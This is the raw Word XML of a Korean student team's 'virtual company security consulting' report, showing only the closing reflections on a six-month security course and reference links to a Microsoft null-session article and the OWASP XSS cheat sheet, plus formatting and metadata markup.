        <w:ind w:left="760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수업을 통해 알게 된 내용으로 점검할 취약점 목록을 설정하고 방어 방법을 종합적으로 테스트 할 수 있었다는 점에서 프로젝트의 의의를 찾을 수 있다고 생각합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다만 지식이 부족해 가상회사를 설정했음에도 특정 산업에 특징을 반영하여 점검이 이루어지지 못했다는 점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배웠던 내용들도 전부 적용해서 프로젝트를 진행하지는 못한다는 점은 아쉽게 느껴집니다.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이후 다시 프로젝트를 기획한다면 가상으로 설정한 회사가 속한 산업에서 일반적으로 이루어지는 보안 설정들을 파악해서 해당 산업에 중요하게 다루어야 할 부분을 집중적으로 다루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오래 전부터 공격이 이루어져서 현재는 대부분 방어가 되어 있는 내용보다 최근에 많이 이루어지는 해킹 방법들을 알아보고 적용해보는 작업을 포함하는 것이 더 의미 있는 프로젝트가 될 것이라고 생각합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRDefault="00706A82">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRPr="00706A82" w:rsidRDefault="00706A82" w:rsidP="00706A82">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>프로젝트를 통해서 느낀 점</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRPr="00706A82" w:rsidRDefault="00706A82" w:rsidP="00706A82">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6개월 동안 수업 내용을 따라가고 시험 보기에 급급하다가 전체적으로 정리해볼 수 있는 시간이 된 것 같아서 좋았고,</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>프로젝트를 진행할수록 취약점 점검이나 대응에 있어서 배운 내용 외에는 아는 게 없는데 아는 것 만으로는 부족하다는 느낌이 많이 들어서 아쉬움이 남는다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRPr="00ED7558" w:rsidRDefault="00E858A2" w:rsidP="00E858A2">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">6개월 동안 수업을 </w:t>
      </w:r>
      <w:r w:rsidR="00ED7558">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>받으</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>면서 전에는 알지 못했던 공격방법이나 방어방법에 대해 많은 것을 배울 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있었는데 이번 프로젝트를 하면서 </w:t>
      </w:r>
      <w:r w:rsidR="00DD3493">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>수업시간에 놓쳤던 것들을 다시 돌아볼 수 있어 의미 있는 시간이었습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED7558" w:rsidRPr="00706A82" w:rsidRDefault="00ED7558" w:rsidP="00E858A2">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>수업시간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었던 내용들을 짧게나마 복습할 수 있었던 시간이었습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평소에 생각하지 않았던 가상회사의 구조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황을 설정하고 공격방법과 대응방법에 대해 조원들과 협의하는 시간을 통해서 혼자서는 할 수 없었던 부분에 대해서 많은 것을 알게 되는 시간이었습</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>니다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00ED7558" w:rsidRPr="00706A82" w:rsidSect="00FE56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39" w:rsidRDefault="00813D39" w:rsidP="009C7634">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00813D39" w:rsidRDefault="00813D39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39" w:rsidRDefault="00813D39" w:rsidP="009C7634">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00813D39" w:rsidRDefault="00813D39" w:rsidP="009C7634">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="1">
    <w:p w:rsidR="00C52CFE" w:rsidRPr="00C52CFE" w:rsidRDefault="00C52CFE" w:rsidP="00C52CFE">
      <w:pPr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C52CFE">
          <w:rPr>
            <w:rStyle w:val="af2"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r w:rsidRPr="00C52CFE">
          <w:rPr>
            <w:rStyle w:val="af2"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
          </w:rPr>
          <w:t>ttps://support.microsoft.com/ko-kr/help/3034016/ipc-share-and-null-session-behavior-in-windows</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
  </w:footnote>
  <w:footnote w:id="2">
    <w:p w:rsidR="00E858A2" w:rsidRDefault="00E858A2" w:rsidP="009C7634">
      <w:pPr>
        <w:pStyle w:val="af3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af4"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2" w:history="1">
        <w:r w:rsidRPr="00CF01D4">
          <w:rPr>
            <w:rStyle w:val="af2"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Shee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3EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FDF8D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6"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="073F3CA6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BDF60B7A"/>
    <w:lvl w:ilvl="0" w:tplc="4C4EBAD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E2428AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="772EC340"/>
    <w:lvl w:ilvl="0" w:tplc="1BD29502">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="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">
    <w:nsid w:val="0E3D5EFD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3AC4D6E"/>
    <w:lvl w:ilvl="0" w:tplc="BB8C61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AF0703"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5EEA9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  <w:sz w:val="26"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:nsid w:val="13263A24"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5E64B80A"/>
    <w:lvl w:ilvl="0" w:tplc="B7108164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>
    <w:nsid w:val="2B0A637B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13D0521E"/>
    <w:lvl w:ilvl="0" w:tplc="E1F06B62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7">
    <w:nsid w:val="32CD1670"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D7A49F0"/>
    <w:lvl w:ilvl="0" w:tplc="5AFC09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A14933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930F36"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D13ED652"/>
    <w:lvl w:ilvl="0" w:tplc="C3FC0CBA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1995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0">
    <w:nsid w:val="3BC82F39"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E3C98B2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1">
    <w:nsid w:val="3FEB5F78"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2906260C"/>
    <w:lvl w:ilvl="0" w:tplc="BB8C61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82E4222">
      <w:start w:val="10"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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0FF45AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5841418"/>
    <w:lvl w:ilvl="0" w:tplc="317A810A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13">
    <w:nsid w:val="437D521D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="423A1318"/>
    <w:lvl w:ilvl="0" w:tplc="6FEC1F6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44257045"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5C2428A0"/>
    <w:lvl w:ilvl="0" w:tplc="FCD054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CC0D16"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BAF601DC"/>
    <w:lvl w:ilvl="0" w:tplc="ECB47A06">
      <w:start w:val="1"/>
      <w:numFmt w:val="ganad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>
    <w:nsid w:val="49F0329F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F240156"/>
    <w:lvl w:ilvl="0" w:tplc="3F8C6FC4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>
    <w:nsid w:val="4A921063"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="576E811A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8">
    <w:nsid w:val="4B6932C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6464EA22"/>
    <w:lvl w:ilvl="0" w:tplc="89BA29FE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9">
    <w:nsid w:val="52677884"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="991899AA"/>
    <w:lvl w:ilvl="0" w:tplc="EAAC4FD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0">
    <w:nsid w:val="56567387"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6DE8E526"/>
    <w:lvl w:ilvl="0" w:tplc="80441608"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1">
    <w:nsid w:val="5BAA5BB6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40E29A7A"/>
    <w:lvl w:ilvl="0" w:tplc="DD5829B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2">
    <w:nsid w:val="5CD46D47"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBB26F26"/>
    <w:lvl w:ilvl="0" w:tplc="7284CB06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3">
    <w:nsid w:val="63586732"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2E26BEBE"/>
    <w:lvl w:ilvl="0" w:tplc="AAC25CC4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>
    <w:nsid w:val="658B5A6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C9E66FE"/>
    <w:lvl w:ilvl="0" w:tplc="5E16C66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5">
    <w:nsid w:val="69455875"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38F2256E"/>
    <w:lvl w:ilvl="0" w:tplc="5270EC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9E66C50"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03C884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7">
    <w:nsid w:val="6C7E6B68"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66567584"/>
    <w:lvl w:ilvl="0" w:tplc="C1DC915A">
      <w:start w:val="2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6D4953B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5EDE06E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9">
    <w:nsid w:val="71E06F09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3140C5C6"/>
    <w:lvl w:ilvl="0" w:tplc="7F9E5A4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>
    <w:nsid w:val="738C259E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE4E7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31">
    <w:nsid w:val="74286700"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1BFE41D8"/>
    <w:lvl w:ilvl="0" w:tplc="B1A24A62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2">
    <w:nsid w:val="7B181805"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFBEC624"/>
    <w:lvl w:ilvl="0" w:tplc="D53E4AD8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="199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35" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2835" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3235" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3635" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4035" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4435" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4835" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="5235" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33">
    <w:nsid w:val="7D656905"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA184896"/>
    <w:lvl w:ilvl="0" w:tplc="A10E05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D6843F4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="21A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sz w:val="24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9"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="21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2"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="3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A"/>
    <w:rsid w:val="000274C8"/>
    <w:rsid w:val="00032B7D"/>
    <w:rsid w:val="000D70E6"/>
    <w:rsid w:val="001320C7"/>
    <w:rsid w:val="00144CF8"/>
    <w:rsid w:val="0019376E"/>
    <w:rsid w:val="001A2D88"/>
    <w:rsid w:val="001B30CB"/>
    <w:rsid w:val="001D043B"/>
    <w:rsid w:val="001E2DD9"/>
    <w:rsid w:val="00223C5C"/>
    <w:rsid w:val="00227DB7"/>
    <w:rsid w:val="00292EC7"/>
    <w:rsid w:val="002C1FCE"/>
    <w:rsid w:val="002E005F"/>
    <w:rsid w:val="002E08A0"/>
    <w:rsid w:val="0034182E"/>
    <w:rsid w:val="003626ED"/>
    <w:rsid w:val="00374C26"/>
    <w:rsid w:val="003C3D2C"/>
    <w:rsid w:val="003D651E"/>
    <w:rsid w:val="00430F0E"/>
    <w:rsid w:val="00463320"/>
    <w:rsid w:val="004837C6"/>
    <w:rsid w:val="004A6F7D"/>
    <w:rsid w:val="004B76C3"/>
    <w:rsid w:val="004D52EE"/>
    <w:rsid w:val="004F3E31"/>
    <w:rsid w:val="004F56F1"/>
    <w:rsid w:val="00502E0B"/>
    <w:rsid w:val="0054339C"/>
    <w:rsid w:val="0057576B"/>
    <w:rsid w:val="005F5CB7"/>
    <w:rsid w:val="00632150"/>
    <w:rsid w:val="00664540"/>
    <w:rsid w:val="006660AD"/>
    <w:rsid w:val="0068217C"/>
    <w:rsid w:val="00690FA5"/>
    <w:rsid w:val="006A78FE"/>
    <w:rsid w:val="006D68AB"/>
    <w:rsid w:val="006F1364"/>
    <w:rsid w:val="00706A82"/>
    <w:rsid w:val="00713A56"/>
    <w:rsid w:val="0072175F"/>
    <w:rsid w:val="00730845"/>
    <w:rsid w:val="00731CFE"/>
    <w:rsid w:val="007743AD"/>
    <w:rsid w:val="007958FD"/>
    <w:rsid w:val="00797472"/>
    <w:rsid w:val="007A2F92"/>
    <w:rsid w:val="007E39F4"/>
    <w:rsid w:val="007E7475"/>
    <w:rsid w:val="007F0889"/>
    <w:rsid w:val="0081286A"/>
    <w:rsid w:val="00813D39"/>
    <w:rsid w:val="00846015"/>
    <w:rsid w:val="00863AB2"/>
    <w:rsid w:val="0089125C"/>
    <w:rsid w:val="00901DE7"/>
    <w:rsid w:val="009167A9"/>
    <w:rsid w:val="00924F61"/>
    <w:rsid w:val="00954D4D"/>
    <w:rsid w:val="00965B96"/>
    <w:rsid w:val="00990193"/>
    <w:rsid w:val="009A67E4"/>
    <w:rsid w:val="009C7634"/>
    <w:rsid w:val="009D16E2"/>
    <w:rsid w:val="009E6C11"/>
    <w:rsid w:val="00A042CE"/>
    <w:rsid w:val="00A15254"/>
    <w:rsid w:val="00A24DB6"/>
    <w:rsid w:val="00A46F6C"/>
    <w:rsid w:val="00A6071B"/>
    <w:rsid w:val="00AC03BE"/>
    <w:rsid w:val="00B01E0D"/>
    <w:rsid w:val="00B34637"/>
    <w:rsid w:val="00B35862"/>
    <w:rsid w:val="00BA1DA7"/>
    <w:rsid w:val="00BB0900"/>
    <w:rsid w:val="00BE0AB2"/>
    <w:rsid w:val="00C05256"/>
    <w:rsid w:val="00C10F59"/>
    <w:rsid w:val="00C22A52"/>
    <w:rsid w:val="00C32B1E"/>
    <w:rsid w:val="00C37A0B"/>
    <w:rsid w:val="00C44DD4"/>
    <w:rsid w:val="00C52CFE"/>
    <w:rsid w:val="00C67042"/>
    <w:rsid w:val="00C90311"/>
    <w:rsid w:val="00C90AE2"/>
    <w:rsid w:val="00CC7E76"/>
    <w:rsid w:val="00CD0B2D"/>
    <w:rsid w:val="00CD5B99"/>
    <w:rsid w:val="00D326E0"/>
    <w:rsid w:val="00DA2618"/>
    <w:rsid w:val="00DB196F"/>
    <w:rsid w:val="00DD3493"/>
    <w:rsid w:val="00DF439F"/>
    <w:rsid w:val="00E151D6"/>
    <w:rsid w:val="00E32B4B"/>
    <w:rsid w:val="00E858A2"/>
    <w:rsid w:val="00E95596"/>
    <w:rsid w:val="00E970E7"/>
    <w:rsid w:val="00EC2F84"/>
    <w:rsid w:val="00EC33A8"/>
    <w:rsid w:val="00EC5E68"/>
    <w:rsid w:val="00ED7558"/>
    <w:rsid w:val="00F02EC6"/>
    <w:rsid w:val="00F53793"/>
    <w:rsid w:val="00F82B4F"/>
    <w:rsid w:val="00FE5652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38181-8E6E-497A-A152-237EF00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A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008128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8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8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8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8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128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128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128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128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128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1286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128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128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8128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128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1286A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81286A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="0081286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1286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128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1286A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128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8128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1286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1286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128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1286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128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1286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81286A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af0">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F82B4F"/>
    <w:pPr>
      <w:ind w:leftChars="400" w:left="800"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="af1">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00FE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Grid Table 2"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="47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66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9C7634"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af3">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009C7634"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:wordWrap w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char4">
    <w:name w:val="각주 텍스트 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="009C7634"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af4">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009C7634"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af5">
    <w:name w:val="바탕글"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00706A8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C05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05256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fontTable" Target="fontTable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theme" Target="theme/theme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wasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/ko-kr/help/3034016/ipc-share-and-null-session-behavior-in-window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E6047-E345-462E-A3ED-42B5BC0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5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상회사 보안 컨설팅</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2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상회사 보안 컨설팅</dc:title>
  <dc:subject/>
  <dc:creator>Windows User</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Windows User</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-07-04T04:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-05T06:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>